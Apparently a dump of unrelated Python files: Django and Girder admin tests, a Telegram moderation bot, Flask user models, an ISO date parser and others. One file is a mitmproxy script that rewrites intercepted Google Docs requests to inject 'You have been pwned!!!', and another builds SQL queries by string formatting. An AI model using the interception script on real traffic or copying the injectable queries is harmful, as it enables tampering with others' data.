list(resp.context_data["cl"].queryset),
[],
)
self.currency.users.add(self.staff_user)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
sorted(
list(resp.context_data["cl"].queryset),
key=sorting_fun,
),
sorted(
list(MetaTransaction.objects.filter(to_wallet__currency=self.currency)),
key=sorting_fun,
),
)
self.staff_user.user_permissions.add(
Permission.objects.get(codename="can_view_all_currencies")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
sorted(
list(resp.context_data["cl"].queryset),
key=sorting_fun,
),
sorted(list(MetaTransaction.objects.all()), key=sorting_fun),
)
class WalletPublickeyRequestAdminTestCase(EcouponTestCaseMixin, TestCase):
def setUp(self):
super().setUp()
new_key = pytezos.crypto.key.Key.generate()
WalletPublicKeyTransferRequest.objects.create(
wallet=self.wallet_1,
old_public_key=self.wallet_1.public_key,
new_public_key=new_key.public_key(),
)
new_key = pytezos.crypto.key.Key.generate()
WalletPublicKeyTransferRequest.objects.create(
wallet=self.wallet_1_2_2,
old_public_key=self.wallet_1_2_2.public_key,
new_public_key=new_key.public_key(),
)
def test_only_staff_see_walletpublickeytransferrequest_admin(self):
self.client.force_login(self.user)
url = reverse("admin:wallet_walletpublickeytransferrequest_changelist")
resp = self.client.get(url)
self.assertEqual(resp.status_code, 302)
self.assertTrue(resp.url.startswith("/admin/login"))
self.user.user_permissions.add(
Permission.objects.get(codename="view_walletpublickeytransferrequest")
)
self.user.user_permissions.add(
Permission.objects.get(codename="can_view_all_currencies")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 302)
self.assertTrue(resp.url.startswith("/admin/login"))
self.client.force_login(self.staff_user)
self.staff_user.user_permissions.add(
Permission.objects.get(codename="view_walletpublickeytransferrequest")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
def test_see_correct_walletpublickeytransferrequest(self):
url = reverse("admin:wallet_walletpublickeytransferrequest_changelist")
def sorting_fun(x):
return x.wallet.wallet_id
self.staff_user.user_permissions.add(
Permission.objects.get(codename="view_walletpublickeytransferrequest")
)
self.client.force_login(self.staff_user)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
list(resp.context_data["cl"].queryset),
[],
)
self.currency.users.add(self.staff_user)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
sorted(
list(resp.context_data["cl"].queryset),
key=sorting_fun,
),
sorted(
list(
WalletPublicKeyTransferRequest.objects.filter(
wallet__currency=self.currency
)
),
key=sorting_fun,
),
)
self.staff_user.user_permissions.add(
Permission.objects.get(codename="can_view_all_currencies")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
sorted(
list(resp.context_data["cl"].queryset),
key=sorting_fun,
),
sorted(list(WalletPublicKeyTransferRequest.objects.all()), key=sorting_fun),
)
class CashOutRequestAdminTestCase(EcouponTestCaseMixin, TestCase):
# TODO: FIXME: add test for admin action
def setUp(self):
super().setUp()
tx1 = Transaction.objects.create(
from_wallet=self.wallet_1, to_wallet=self.currency.owner_wallet, amount=5
)
CashOutRequest.objects.create(
transaction=tx1,
beneficiary_name="baba",
beneficiary_iban="CH93 0076 2011 6238 5295 7",
)
tx2 = Transaction.objects.create(
from_wallet=self.wallet_2_2,
to_wallet=self.currency_2.owner_wallet,
amount=5,
)
CashOutRequest.objects.create(
transaction=tx2,
beneficiary_name="baba",
beneficiary_iban="CH93 0076 2011 6238 5295 7",
)
def test_only_staff_see_cashoutrequest_admin(self):
self.client.force_login(self.user)
url = reverse("admin:wallet_cashoutrequest_changelist")
resp = self.client.get(url)
self.assertEqual(resp.status_code, 302)
self.assertTrue(resp.url.startswith("/admin/login"))
self.user.user_permissions.add(
Permission.objects.get(codename="view_cashoutrequest")
)
self.user.user_permissions.add(
Permission.objects.get(codename="can_view_all_currencies")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 302)
self.assertTrue(resp.url.startswith("/admin/login"))
self.client.force_login(self.staff_user)
self.staff_user.user_permissions.add(
Permission.objects.get(codename="view_cashoutrequest")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
def test_see_correct_cashoutrequest(self):
url = reverse("admin:wallet_cashoutrequest_changelist")
def sorting_fun(x):
return x.transaction.from_wallet.wallet_id
self.staff_user.user_permissions.add(
Permission.objects.get(codename="view_cashoutrequest")
)
self.client.force_login(self.staff_user)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
list(resp.context_data["cl"].queryset),
[],
)
self.currency.users.add(self.staff_user)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
sorted(
list(resp.context_data["cl"].queryset),
key=sorting_fun,
),
sorted(
list(
CashOutRequest.objects.filter(
transaction__from_wallet__currency=self.currency
)
),
key=sorting_fun,
),
)
self.staff_user.user_permissions.add(
Permission.objects.get(codename="can_view_all_currencies")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
sorted(
list(resp.context_data["cl"].queryset),
key=sorting_fun,
),
sorted(list(CashOutRequest.objects.all()), key=sorting_fun),
)
|
# constants.py
FRAME_MAX_X = 500
FRAME_MAX_Y = 500
CELL_WIDTH = 10
# basic colors
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
BLUE = (0, 0, 255)
GREEN = (0, 255, 0)
RED = (255, 0, 0)
|
import pathlib
from types import ModuleType
from jinja2 import Template
from omymodels.models.gino import core as g
from omymodels.models.pydantic import core as p
from omymodels.models.dataclass import core as d
from omymodels.models.sqlalchemy import core as s
from omymodels.models.sqlalchemy_core import core as sc
models = {
"gino": g,
"pydantic": p,
"dataclass": d,
"sqlalchemy": s,
"sqlalchemy_core": sc,
}
supported_models = list(models.keys())
def get_model(models_type: str) -> ModuleType:
model = models.get(models_type)
return model
def get_generator_by_type(models_type: str):
model = get_model(models_type)
if not model:
raise ValueError(
f"Unsupported models type {models_type}. Possible variants: {supported_models}"
)
return getattr(model, "ModelGenerator")()
def render_jinja2_template(models_type: str, models: str, headers: str) -> str:
template_file = (
pathlib.Path(__file__).parent / "models" / models_type / f"{models_type}.jinja2"
)
with open(template_file) as t:
template = t.read()
template = Template(template)
params = {"models": models, "headers": headers}
return template.render(**params)
|
'''
Created on 1.12.2016
@author: Darren
''''''
Say you have an array for which the ith element is the price of a given stock on day i.
Design an algorithm to find the maximum profit. You may complete as many transactions as you like (ie, buy one and sell one share of the stock multiple times). However, you may not engage in multiple transactions at the same time (ie, you must sell the stock before you buy again)."
'''
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright 2013 Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import cherrypy
import json
from .. import base
from girder.constants import AccessType
def setUpModule():
base.startServer()
def tearDownModule():
base.stopServer()
class CollectionTestCase(base.TestCase):
def setUp(self):
base.TestCase.setUp(self)
admin = {
'email': 'admin@email.com',
'login': 'admin',
'firstName': 'Admin',
'lastName': 'Admin',
'password': 'adminpassword',
'admin': True
}
self.admin = self.model('user').createUser(**admin)
user = {
'email': 'good@email.com',
'login': 'goodlogin',
'firstName': 'First',
'lastName': 'Last',
'password': 'goodpassword',
'admin': False
}
self.user = self.model('user').createUser(**user)
coll = {
'name': 'Test Collection',
'description': 'The description',
'public': True,
'creator': self.admin
}
self.collection = self.model('collection').createCollection(**coll)
def testCreateAndListCollections(self):
self.ensureRequiredParams(
path='/collection', method='POST', required=['name'],
user=self.admin)
# Try to create a collection anonymously; should fail
resp = self.request(path='/collection', method='POST', params={
'name': 'new collection'
})
self.assertStatus(resp, 401)
# Try to create a collection as non-admin user; should fail
resp = self.request(path='/collection', method='POST', params={
'name': 'new collection'
}, user=self.user)
self.assertStatus(resp, 403)
# Create the collection as the admin user, make it private
resp = self.request(path='/collection', method='POST', params={
'name': ' New collection ',
'description': ' my description ',
'public': 'false'
}, user=self.admin)
self.assertStatusOk(resp)
newCollId = resp.json['_id']
# Now attempt to list the collections as anonymous user
resp = self.request(path='/collection')
self.assertStatusOk(resp)
self.assertEqual(len(resp.json), 1)
self.assertEqual(resp.json[0]['name'], self.collection['name'])
# Admin user should see both collections
resp = self.request(path='/collection', user=self.admin)
self.assertStatusOk(resp)
self.assertEqual(len(resp.json), 2)
self.assertEqual(resp.json[0]['name'], 'New collection')
self.assertEqual(resp.json[0]['description'], 'my description')
self.assertEqual(resp.json[1]['name'], self.collection['name'])
# Test text search
resp = self.request(path='/collection', user=self.admin, params={
'text': 'new'
})
self.assertStatusOk(resp)
self.assertEqual(len(resp.json), 1)
self.assertEqual(resp.json[0]['_id'], newCollId)
self.assertEqual(resp.json[0]['name'], 'New collection')
def testDeleteCollection(self):
# Requesting with no path should fail
resp = self.request(path='/collection', method='DELETE',
user=self.admin)
self.assertStatus(resp, 400)
# User without permission should not be able to delete collection
resp = self.request(path='/collection/%s' % self.collection['_id'],
method='DELETE', user=self.user)
self.assertStatus(resp, 403)
# Admin user should be able to delete the collection
resp = self.request(path='/collection/%s' % self.collection['_id'],
method='DELETE', user=self.admin)
self.assertStatusOk(resp)
coll = self.model('collection').load(self.collection['_id'], force=True)
self.assertEqual(coll, None)
|
import logging
import time
import cStringIO
from PIL import Image
from libmproxy.protocol.http import decoded
import re
def request(context, flow):
try:
logging.debug("request")
if (flow.request.pretty_host(hostheader=True).endswith("docs.google.com")):
#logging.debug("Before:")
#logging.debug(flow.request.content)
m = re.match(r'(?P<msg_start>[\w\W]+)(?P<msg_info>\[null,\d+,[^\]]+\])(?P<msg_end>[\w\W]+)', flow.request.content)
if not m:
# logging.debug("Match failed")
return 0
replace = (m.group('msg_start') + '[null,2, "You have been pwned!!!"]'+m.group('msg_end'))
flow.request.content = replace
logging.debug("Google table request was changed!")
#logging.debug(flow.request.content)
except Exception as e:
logging.debug("CHECK CODE, IDIOT!!!!!!!!!!!")
logging.debug(type(e))
logging.debug(e)
def start (context, argv):
logging.basicConfig(filename="log.log",level=logging.DEBUG)
logging.debug("============================================\n")
logging.debug(time.time())
logging.debug("Startup:\n")
context.log("start")
|
import numpy as np
import skimage.color
import skimage.filters
import skimage.io
import skimage.viewer
# read and display the original image
image = skimage.io.imread('images/coins.png')
viewer = skimage.viewer.ImageViewer(image)
viewer.show()
# blur and grayscale before thresholding
blur = skimage.color.rgb2gray(image)
blur = skimage.filters.gaussian(image, sigma=sigma)
# perform adaptive thresholding
t = skimage.filters.threshold_otsu(blur)
mask = blur > t
viewer = skimage.viewer.ImageViewer(mask)
viewer.show()
# use the mask to select the "interesting" part of the image
sel = np.zeros_like(image)
sel[mask] = image[mask]
# display the result
viewer = skimage.viewer.ImageViewer(sel)
viewer.show()
|
# -*-coding:utf8-*-
import random
from abenc_bsw07 import *
import sqlite3
class RegistrationCenter:
def __init__(self):
self.groupObj = PairingGroup('SS512')
self.cpabe = CPabe_BSW07(self.groupObj)
(self.pk, self.mk) = self.cpabe.setup()
def initation(self):
# Xij key #############################
cs_secret_key = [random.getrandbits(1024), random.getrandbits(1024)]
# service use the pk mk attrs get sk and enc it
# sk = cpabe.keygen(pk, mk, attrs)
conn_01 = sqlite3.connect('service_01.db')
conn_02 = sqlite3.connect('service_02.db')
c_01 = conn_01.cursor()
c_02 = conn_02.cursor()
PK = str(self.pk)
MK = str(self.mk)
service_key_01 = str(cs_secret_key[0])
service_key_02 = str(cs_secret_key[1])
c_01.execute('insert into main.base_information (service_id, service_key, pk, mk) '
'values ("{}", "{}", "{}", "{}")'.format(1, service_key_01, PK, MK))
c_02.execute('insert into main.base_information (service_id, service_key, pk, mk) '
'values ("{}", "{}", "{}", "{}")'.format(1, service_key_02, PK, MK))
conn_01.commit()
conn_01.close()
conn_02.commit()
conn_02.close()
def smart_car(self, user_id, mNBPW):
global service_key_01, service_key_02
pair_key_01 = random.getrandbits(1024)
pair_key_02 = random.getrandbits(1024)
conn_01 = sqlite3.connect('service_01.db')
conn_02 = sqlite3.connect('service_02.db')
c_01 = conn_01.cursor()
c_02 = conn_02.cursor()
cursor_01 = c_01.execute("SELECT service_key from main.base_information")
for row_01 in cursor_01:
service_key_01 = row_01[0]
cursor_02 = c_02.execute("SELECT service_key from main.base_information")
for row_02 in cursor_02:
service_key_02 = row_02[0]
c_01.execute("insert into main.authentica_information(user_id, user_fake_id, pair_key) "
"values (\"{}\", \"{}\", \"{}\")".format(user_id, user_id + 200, str(pair_key_01)))
c_02.execute("insert into main.authentica_information(user_id, user_fake_id, pair_key) "
"values (\"{}\", \"{}\", \"{}\")".format(user_id, user_id + 200, str(pair_key_02)))
conn_01.commit()
conn_02.commit()
conn_01.close()
conn_02.close()
M_01 = hash(str(hash(int(pair_key_01) ^ int(user_id))) + str(service_key_01))
M_02 = hash(str(hash(pair_key_02 ^ user_id)) + str(service_key_02))
N_01 = M_01 ^ mNBPW
N_02 = M_02 ^ mNBPW
NId_cs_01 = hash(str(1) + service_key_01)
NId_cs_02 = hash(str(2) + service_key_02)
# user temple_id ##############################################
temple_user_id = user_id + 200
#
attrs_01 = ['ONE', 'TWO', 'THREE']
attrs_02 = ['ONE', 'TWO', 'THREE']
sk_01 = self.cpabe.keygen(self.pk, self.mk, attrs_01)
sk_02 = self.cpabe.keygen(self.pk, self.mk, attrs_02)
service_result_01 = [1, N_01, NId_cs_01, attrs_01, sk_01]
service_result_02 = [2, N_02, NId_cs_02, attrs_02, sk_02]
sr = [service_result_01, service_result_02]
smart_car_result = [temple_user_id, sr, self.pk]
return smart_car_result
# base information
# service id, service_key , master_key, master_public_key
|
utc_offset = 8
data_extension = ".ill"
'''login token'''
login_token = "put your token here"
'''path'''
illust_data_path = "data\\"
illust_thbnl_path = "thumbnails\\"
illust_cache_path = "cache\\"
auth_head_path = "auth\\"
download_path = "your download folder\\"
r18_subfolder = "R-18\\"
gif_path = download_path
group_path = download_path
'''download param'''
max_download_thread = 4
'''detail param'''
tags_pre_line = 1
stream_per_load = 4
'''explore param'''
like_btn_size = 50
thumbnail_size = 360
pic_grid_row = 15
pic_grid_column = 2
nsfw = 0
'''proxy'''
proxies = {
'https': 'socks5://127.0.0.1:1080',
'http': 'socks5://127.0.0.1:1080'
}
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# -------------------------------------------------------------------------------
# Copyright (c) 2012 Michael Hull.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# - Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# -------------------------------------------------------------------------------
import numpy as np
import itertools
from morphforge.morphology.visitor.visitorfactory import SectionVistorFactory
from morphforge.morphology.core import MorphLocation
from morphforge.morphology.core import MorphPath
class MorphLocator(object):
@classmethod
def get_locations_at_distance_away_from_dummy(cls, morphology,
distance, section_predicate=None):
dist_to_section_distal = SectionVistorFactory.dict_section_distal_dist_from_soma(morph=morphology)()
# Section predicates: allows us to generate only on a path, region, etc
section_predicate = section_predicate if section_predicate else lambda s:True
locations = []
for section in morphology:
if not section_predicate(section):
continue
if section.is_a_root_section():
if distance < dist_to_section_distal[section]:
locations.append(MorphLocation(section=section, sectionpos=distance/dist_to_section_distal[section]) )
else:
pass
else:
proximal_dist = dist_to_section_distal[section.parent]
distal_dist = dist_to_section_distal[section]
# Does a distance fall on this section:
if proximal_dist <= distance < distal_dist:
prop = (distance - proximal_dist) / (distal_dist - proximal_dist)
assert 0.0 <= prop <= 1.0
locations.append(MorphLocation(section=section, sectionpos=prop))
dummy = MorphLocation(morphology.get_dummy_section().children[0], 0.0)
# Some sanity checking:
for loc in locations:
p = MorphPath(loc, dummy)
assert np.fabs(p.get_length() - distance) < 0.01
return locations
@classmethod
def get_locations_at_distances_away_from_dummy(cls, morphology, distances, section_predicate=None):
return list(itertools.chain(*[cls.get_locations_at_distance_away_from_dummy(morphology, distance, section_predicate=section_predicate) for distance in distances] ))
|
"""Parsing ISO dates.
Originally taken from pyiso8601 (http://code.google.com/p/pyiso8601/)
Modified to match the behavior of dateutil.parser:
- raise ValueError instead of ParseError
- return naive datetimes by default
- uses pytz.FixedOffset
This is the original License:
Copyright (c) 2007 Michael Twomey
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import re
from datetime import datetime, timedelta, timezone, tzinfo
from typing import Mapping, Match, Optional, Pattern, cast
__all__ = ['parse']
# Adapted from http://delete.me.uk/2005/03/iso8601.html
RE_ISO8601: Pattern = re.compile( # noqa
r'(?P<year>[0-9]{4})(-(?P<month>[0-9]{1,2})(-(?P<day>[0-9]{1,2})'
r'((?P<separator>.)(?P<hour>[0-9]{2}):(?P<minute>[0-9]{2})'
r'(:(?P<second>[0-9]{2})(\.(?P<microsecond>[0-9]+))?)?'
r'(?P<timezone>Z|(([-+])([0-9]{2}).?([0-9]{2})))?)?)?)?')
RE_TIMEZONE: Pattern = re.compile(
'(?P<prefix>[+-])(?P<hours>[0-9]{2}).?(?P<minutes>[0-9]{2})$')
class InvalidTZ(Exception):
"""Isoformat date does not have a valid timezone."""
def parse(datetime_string: str) -> datetime:
"""Parse and convert ISO 8601 string into a datetime object."""
m = RE_ISO8601.match(datetime_string)
if not m:
raise ValueError(
f'unable to parse date string {datetime_string!r}')
groups = cast(Mapping[str, str], m.groupdict())
return datetime(
int(groups['year']),
int(groups['month']),
int(groups['day']),
int(groups['hour'] or 0),
int(groups['minute'] or 0),
int(groups['second'] or 0),
int(groups['microsecond'] or 0),
parse_tz(groups['timezone']) if groups['timezone'] else None,
)
def parse_tz(tz: str) -> tzinfo:
if tz == 'Z':
return timezone.utc
match: Optional[Match] = RE_TIMEZONE.match(tz)
if match is not None:
prefix, hours, minutes = match.groups()
return _apply_tz_prefix(prefix, int(hours), int(minutes))
raise InvalidTZ(f'Missing or invalid timezone information: {tz!r}')
def _apply_tz_prefix(prefix: str, hours: int, minutes: int) -> tzinfo:
if prefix == '-':
hours = -hours
minutes = -minutes
return timezone(timedelta(minutes=(minutes + (hours * 60))))
|
# Project Euler Problem 2
# Find the sum of all the even-valued terms in the Fibonacci sequence which do not exceed four million.
# Holly Becker
# Done 2008-12-20
def main():
a = 1
b = 1
c = a+b
total = 0
while c<4000000:
if c%2==0:
total+=c
a=b
b=c
c=a+b
print(total)
# 2013-05-01
def even_fibonacci():
(a, b) = (0,1)
c = a + b
while c < 4e6:
if c % 2 == 0:
yield a+b
(a, b) = (b, a + b)
c = a + b
def attempt_two():
print((sum(even_fibonacci())))
# This may be a small improvement. The Fibonacci series is:
#1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610...
#Now, replacing an odd number with O and an even with E, we get:
#O, O, E, O, O, E, O, O, E, O, O, E, O, O, E...
#And so each third number is even. We don't need to calculate the odd numbers. Starting from an two odd terms x, y, the series is:
#x, y, x + y, x + 2y, 2x + 3y, 3x + 5y
def another_even_fibonacci():
(a, b) = (1,1)
while a+b < 4e6:
yield a+b
(a, b) = (a + 2*b, 2*a + 3*b)
def attempt_three():
print((sum(another_even_fibonacci())))
|
from decorators import group
from db.models.group import Group
from telepot.exception import TelegramError
from db.queries import get_max_warns, get_user, group_exist, user_exist
from db.inserts import (set_welcome_msg, addto_db, commit_and_close, set_rules, set_chat_link,
warn_user, set_max_warn, unwarn_user, add_user, remove_from_db)
class AdminCmd(object):
'''
This class represents the admin commands
'''
def __init__(self, bot, metadata, tycot):
self.bot = bot
self.metadata = metadata
self.tycot = tycot
super().__init__()
@group.only
def start(self):
'''
Register the group into the database
'''
if not group_exist(self.metadata['chat_id']):
addto_db(Group(self.metadata['chat_name'], self.metadata['chat_id']))
commit_and_close()
self.bot.sendMessage(self.metadata['chat_id'], 'Seu grupo foi cadastrado com sucesso!',
reply_to_message_id=self.metadata['msg_id'])
else:
self.bot.sendMessage(self.metadata['chat_id'], '<b>Seu grupo já está cadastrado!</b>',
parse_mode='HTML',
reply_to_message_id=self.metadata['msg_id'])
@group.only
def defwelcome(self, msg):
set_welcome_msg(self.metadata['chat_id'],
msg.replace("/defwelcome ", ""))
self.bot.sendMessage(self.metadata['chat_id'],
'A mensagem de boas-vindas foi alterada com sucesso!',
reply_to_message_id=self.metadata['msg_id'])
@group.only
def defrules(self, msg):
set_rules(self.metadata['chat_id'],
msg.replace("/defregras ", ""))
self.bot.sendMessage(self.metadata['chat_id'],
'As novas regras foram salvas com sucesso!',
reply_to_message_id=self.metadata['msg_id'])
@group.only
def ban(self, msg):
'''
Ban the user from the group. if the user is an admin send a warning message.
'''
user_first_name = self.metadata['rpl_first_name']
user_id = self.metadata['rpl_user_id']
msg_id = self.metadata['rpl_msg_id']
try:
self.bot.kickChatMember(self.metadata['chat_id'], user_id)
self.bot.sendMessage(self.metadata['chat_id'],
f'<b>{user_first_name}</b> foi retirado do grupo.',
parse_mode='HTML', reply_to_message_id=msg_id)
except TelegramError:
self.bot.sendMessage(self.metadata['chat_id'],
f'<b>Não posso banir administradores!</b>', parse_mode='HTML',
reply_to_message_id=msg_id)
@group.only
def deflink(self, msg):
''' See: https://core.telegram.org/bots/api#exportchatinvitelink'''
if self.metadata['chat_type'] == 'supergroup':
self.bot.sendMessage(self.metadata['chat_id'],
'Link já foi definido por padrão.',
reply_to_message_id=self.metadata['msg_id'])
else:
set_chat_link(self.metadata['chat_id'],
msg.replace("/deflink ", ""))
self.bot.sendMessage(self.metadata['chat_id'],
'Link do grupo salvo com sucesso!',
reply_to_message_id=self.metadata['msg_id'])
@group.only
def maxwarn(self, msg):
set_max_warn(self.metadata['chat_id'],
msg.replace("/defmaxwarn ", ""))
self.bot.sendMessage(self.metadata['chat_id'],
'Total de advertencias salvas com sucesso!',
reply_to_message_id=self.metadata['msg_id'])
def _kick_user(self, user, group_max_warn):
user_name = user.user_name
if user.total_warns == group_max_warn:
self.bot.sendMessage(self.metadata['chat_id'],
f'<b>{user_name}</b> expulso por atingir o limite de advertencias.',
parse_mode='HTML',
reply_to_message_id=self.metadata['rpl_msg_id'])
remove_from_db(user)
self.bot.kickChatMember(self.metadata['chat_id'], self.metadata['rpl_user_id'])
@group.only
def warn(self):
first_name = self.metadata['rpl_first_name']
user_id = self.metadata['rpl_user_id']
msg_id = self.metadata['rpl_msg_id']
if user_id in self.tycot.admins_ids:
self.bot.sendMessage(self.metadata['chat_id'],
(f'<b>{first_name}</b> é um dos administradores.\n'
'Não posso advertir administradores.'), parse_mode='HTML',
reply_to_message_id=self.metadata['msg_id'])
else:
if not user_exist(self.metadata['chat_id'], user_id):
user = add_user(first_name, user_id, self.metadata['chat_id'])
user = get_user(user_id)[0]
group_max_warns = get_max_warns(self.metadata['chat_id'])
warn_user(self.metadata['chat_id'], user_id)
self.bot.sendMessage(self.metadata['chat_id'],
(f'{first_name} <b>foi advertido'
f' ({user.total_warns}/{group_max_warns})</b>.'),
parse_mode='HTML',
# reply_markup=self.keyboard_warn(user_id),
reply_to_message_id=msg_id)
self._kick_user(user, group_max_warns)
@group.only
def unwarn(self):
first_name = self.metadata['rpl_first_name']
user_id = self.metadata['rpl_user_id']
msg_id = self.metadata['rpl_msg_id']
if user_id in self.tycot.admins_ids:
self.bot.sendMessage(self.metadata['chat_id'],
'Administradores não possuem advertências.',
reply_to_message_id=self.metadata['msg_id'])
else:
user = get_user(user_id)[0] # get the user from db
if user.total_warns == 0:
self.bot.sendMessage(self.metadata['chat_id'],
f'<b>{first_name}</b> não possui advertencias.',
parse_mode='HTML',
reply_to_message_id=msg_id)
else:
unwarn_user(self.metadata['chat_id'], user_id)
self.bot.sendMessage(self.metadata['chat_id'], f'<b>{first_name} foi perdoado.</b>',
parse_mode='HTML',
reply_to_message_id=msg_id)
|
from flask import current_app
from flask.ext.login import UserMixin, AnonymousUserMixin
from werkzeug.security import generate_password_hash, check_password_hash
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer, \
BadSignature, SignatureExpired
from .. import db, login_manager
from sqlalchemy import or_, desc, func
from ..models import Ratings
import operator
class Permission:
GENERAL = 0x01
VENDOR = 0x02
MERCHANT = 0x04
ADMINISTER = 0x08
class Role(db.Model):
__tablename__ = 'roles'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), unique=True)
index = db.Column(db.String(64))
default = db.Column(db.Boolean, default=False, index=True)
permissions = db.Column(db.Integer)
users = db.relationship('User', backref='role', lazy='dynamic')
@staticmethod
def insert_roles():
roles = {
'Merchant': (
Permission.GENERAL | Permission.MERCHANT, 'merchant', False
),
'Vendor': (
Permission.GENERAL | Permission.VENDOR, 'vendor', False
),
'Administrator': (
Permission.ADMINISTER, 'admin', False
)
}
for r in roles:
role = Role.query.filter_by(name=r).first()
if role is None:
role = Role(name=r)
role.permissions = roles[r][0]
role.index = roles[r][1]
role.default = roles[r][2]
db.session.add(role)
db.session.commit()
def __repr__(self):
return '<Role \'%s\'>' % self.name
class User(UserMixin, db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
confirmed = db.Column(db.Boolean, default=False)
first_name = db.Column(db.String(1000), index=True)
last_name = db.Column(db.String(1000), index=True)
email = db.Column(db.String(1000), unique=True, index=True)
ratings = db.relationship("Ratings", backref="users", lazy="dynamic", cascade='all, delete-orphan')
password_hash = db.Column(db.String(128))
role_id = db.Column(db.Integer, db.ForeignKey('roles.id'))
tutorial_completed = db.Column(db.Boolean, default=False)
# polymorphism
user_type = db.Column(db.String(32), nullable=False, default='user')
__mapper_args__ = {
'polymorphic_identity': 'user',
'polymorphic_on': user_type
}
# application-specific profile fields
description = db.Column(db.String(128), default='')
handles_credit = db.Column(db.Boolean, default=True)
handles_cash = db.Column(db.Boolean, default=True)
def __init__(self, **kwargs):
super(User, self).__init__(**kwargs)
def full_name(self):
return '%s %s' % (self.first_name, self.last_name)
def can(self, permissions):
return self.role is not None and \
(self.role.permissions & permissions) == permissions
def is_admin(self):
return self.can(Permission.ADMINISTER)
def is_vendor(self):
return self.can(Permission.VENDOR)
def is_merchant(self):
return self.can(Permission.MERCHANT)
def is_merchant_or_vendor(self):
return self.can(Permission.MERCHANT) or self.can(Permission.VENDOR)
@property
def password(self):
raise AttributeError('`password` is not a readable attribute')
@password.setter
def password(self, password):
self.password_hash = generate_password_hash(password)
def verify_password(self, password):
return check_password_hash(self.password_hash, password)
def generate_confirmation_token(self, expiration=604800):
"""Generate a confirmation token to email a new user."""
s = Serializer(current_app.config['SECRET_KEY'], expiration)
return s.dumps({'confirm': self.id})
def generate_email_change_token(self, new_email, expiration=3600):
"""Generate an email change token to email an existing user."""
s = Serializer(current_app.config['SECRET_KEY'], expiration)
return s.dumps({'change_email': self.id, 'new_email': new_email})
def generate_password_reset_token(self, expiration=3600):
"""
Generate a password reset change token to email to an existing user.
"""
s = Serializer(current_app.config['SECRET_KEY'], expiration)
return s.dumps({'reset': self.id})
def confirm_account(self, token):
"""Verify that the provided token is for this user's id."""
s = Serializer(current_app.config['SECRET_KEY'])
try:
data = s.loads(token)
except (BadSignature, SignatureExpired):
return False
if data.get('confirm') != self.id:
return False
self.confirmed = True
db.session.add(self)
return True
def change_email(self, token):
"""Verify the new email for this user."""
s = Serializer(current_app.config['SECRET_KEY'])
try:
data = s.loads(token)
except (BadSignature, SignatureExpired):
return False
if data.get('change_email') != self.id:
return False
new_email = data.get('new_email')
if new_email is None:
return False
if self.query.filter_by(email=new_email).first() is not None:
return False
self.email = new_email
